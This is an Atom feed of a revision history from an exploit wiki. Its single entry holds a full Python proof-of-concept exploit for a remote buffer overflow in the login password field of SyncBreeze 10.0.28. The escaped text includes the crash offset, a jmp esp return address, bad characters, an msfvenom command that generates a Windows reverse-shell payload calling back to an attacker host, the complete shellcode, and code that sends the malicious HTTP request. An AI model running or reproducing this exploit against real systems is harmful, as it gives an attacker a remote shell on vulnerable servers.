<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=SyncBreeze_10.0.28_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>SyncBreeze 10.0.28 緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=SyncBreeze_10.0.28_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=SyncBreeze_10.0.28_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-20T14:32:55Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=SyncBreeze_10.0.28_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1279&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow # Date: 18-Sep-2020 # Exploit Author: Abdessalam king(A.salam) # Vendor Homepage: http://...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=SyncBreeze_10.0.28_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1279&amp;oldid=prev"/>
		<updated>2021-04-08T09:54:21Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: SyncBreeze 10.0.28 - &amp;#039;password&amp;#039; Remote Buffer Overflow # Date: 18-Sep-2020 # Exploit Author: Abdessalam king(A.salam) # Vendor Homepage: http://...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow&lt;br /&gt;
# Date: 18-Sep-2020&lt;br /&gt;
# Exploit Author: Abdessalam king(A.salam)&lt;br /&gt;
# Vendor Homepage: http://www.syncbreeze.com&lt;br /&gt;
# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe&lt;br /&gt;
# Version: 10.0.28&lt;br /&gt;
# Tested on: Windows 7,windows xp,windows 10&lt;br /&gt;
#72413372 [*] Exact match at offset 520&lt;br /&gt;
#jmp esp FFE4 \xff\xe4&lt;br /&gt;
#!mona modules&lt;br /&gt;
#!mona find -s &amp;quot;\xff\xe4&amp;quot; -m libspp.dll&lt;br /&gt;
#address esp =&amp;gt; 10090C83&lt;br /&gt;
#badchars ==&amp;gt; &amp;quot;\x00\x0a\x0d\x25\x26\x2b\x3d&amp;quot;&lt;br /&gt;
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c&lt;br /&gt;
-b &amp;quot;\x00\x0a\x0d\x25\x26\x2b\x3d&amp;quot;  EXITFUNC=thread&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
import socket&lt;br /&gt;
&lt;br /&gt;
shell =&amp;quot;&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\xba\x4b\x38\x98\x39\xdd\xc7\xd9\x74\x24\xf4\x5f\x33\xc9\xb1&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x53\x83\xef\xfc\x31\x57\x10\x03\x57\x10\xa9\xcd\x64\xd1\xaf&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x2e\x95\x22\xcf\xa7\x70\x13\xcf\xdc\xf1\x04\xff\x97\x54\xa9&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x74\xf5\x4c\x3a\xf8\xd2\x63\x8b\xb6\x04\x4d\x0c\xea\x75\xcc&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x8e\xf0\xa9\x2e\xae\x3b\xbc\x2f\xf7\x21\x4d\x7d\xa0\x2e\xe0&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x92\xc5\x7a\x39\x18\x95\x6b\x39\xfd\x6e\x8a\x68\x50\xe4\xd5&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\xaa\x52\x29\x6e\xe3\x4c\x2e\x4a\xbd\xe7\x84\x21\x3c\x2e\xd5&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\xca\x93\x0f\xd9\x39\xed\x48\xde\xa1\x98\xa0\x1c\x5c\x9b\x76&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x5e\xba\x2e\x6d\xf8\x49\x88\x49\xf8\x9e\x4f\x19\xf6\x6b\x1b&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x45\x1b\x6a\xc8\xfd\x27\xe7\xef\xd1\xa1\xb3\xcb\xf5\xea\x60&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x75\xaf\x56\xc7\x8a\xaf\x38\xb8\x2e\xbb\xd5\xad\x42\xe6\xb1&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x02\x6f\x19\x42\x0c\xf8\x6a\x70\x93\x52\xe5\x38\x5c\x7d\xf2&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x3f\x77\x39\x6c\xbe\x77\x3a\xa4\x05\x23\x6a\xde\xac\x4b\xe1&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x1e\x50\x9e\x9c\x15\xf7\x70\x83\xd7\x6d\x71\x29\x2a\x1a\x9b&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\xa2\xf5\x3a\xa4\x68\x9e\xd3\x58\x93\xbe\xb3\xd5\x75\xaa\xa3&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\xb3\x2e\x43\x06\xe0\xe6\xf4\x79\xc3\x8c\x3b\xf0\xb3\xd9\xd3&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x4c\xaa\xde\xdc\x4c\xf9\x48\x4b\xc7\xed\x4c\x6a\xd8\x38\xe5&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\xfb\x4f\xb7\x64\x49\xf1\xc8\xac\x3b\xf1\x5c\x4b\xea\xa6\xc8&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x51\xcb\x81\x57\xa9\x3e\x92\x9f\x55\xbf\xb8\xd4\x60\x55\x83&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x82\x8c\xb9\x03\x52\xdb\xd3\x03\x3a\xbb\x87\x57\x5f\xc4\x1d&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\xc4\xcc\x51\x9e\xbd\xa1\xf2\xf6\x43\x9c\x35\x59\xbb\xcb\x45&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x9e\x43\x8d\x4e\x5e\x87\x58\x97\x15\xee\x59\xac\x36\xed\x77&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\xd9\xde\xa8\x12\x60\x83\x4a\xc9\xa7\xba\xc8\xfb\x57\x39\xd0&amp;quot;&lt;br /&gt;
shell +=&amp;quot;\x8e\x52\x05\x56\x63\x2f\x16\x33\x83\x9c\x17\x16&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
payload = &amp;quot;username=AAAAA&amp;amp;password=&amp;quot;+&amp;quot;A&amp;quot;*520+&amp;quot;\x83\x0c\x09\x10&amp;quot;+ &amp;quot;\x90&amp;quot; *&lt;br /&gt;
20 + shell +&amp;quot;\x90&amp;quot;*(1400-520-4-20-len(shell))&lt;br /&gt;
req =&amp;quot;&amp;quot;&lt;br /&gt;
req += &amp;quot;POST /login HTTP/1.1\r\n&amp;quot;&lt;br /&gt;
req += &amp;quot;Host: 192.168.1.20\r\n&amp;quot;&lt;br /&gt;
req += &amp;quot;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101&lt;br /&gt;
Firefox/68.0\r\n&amp;quot;&lt;br /&gt;
req += &amp;quot;Accept:&lt;br /&gt;
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n&amp;quot;&lt;br /&gt;
req += &amp;quot;Accept-Language: en-US,en;q=0.5\r\n&amp;quot;&lt;br /&gt;
req += &amp;quot;Accept-Encoding: gzip, deflate\r\n&amp;quot;&lt;br /&gt;
req += &amp;quot;Referer: http://192.168.1.20/login\r\n&amp;quot;&lt;br /&gt;
req += &amp;quot;Content-Type: application/x-www-form-urlencoded\r\n&amp;quot;&lt;br /&gt;
req += &amp;quot;Content-Length: &amp;quot;+str(len(payload))+&amp;quot;\r\n&amp;quot;&lt;br /&gt;
req += &amp;quot;Connection: keep-alive\r\n&amp;quot;&lt;br /&gt;
req += &amp;quot;Upgrade-Insecure-Requests: 1\r\n&amp;quot;&lt;br /&gt;
req += &amp;quot;\r\n&amp;quot;&lt;br /&gt;
req += payload&lt;br /&gt;
# print req&lt;br /&gt;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)&lt;br /&gt;
s.connect((&amp;quot;192.168.1.20&amp;quot;,80))&lt;br /&gt;
s.send(req)&lt;br /&gt;
print s.recv(1024)&lt;br /&gt;
&lt;br /&gt;
s.close()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>